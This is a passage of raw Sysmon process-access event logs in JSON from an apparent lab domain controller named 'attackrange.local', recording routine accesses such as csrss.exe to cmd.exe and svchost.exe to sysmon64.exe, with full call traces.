(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f81366(wow64)","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6068,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.511\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11DA-5F25-0000-001003CF0800}\r\nTargetProcessId: 4880\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.511","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11DA-5F25-0000-001003CF0800}","TargetProcessId":"4880","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6069,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.511\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.511","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6070,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.511\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.511","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6071,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.511\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.511","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6072,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.511\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.511","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6073,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.511\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.511","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6074,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.511\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.511","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6075,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.511\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.511","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6076,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.511\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 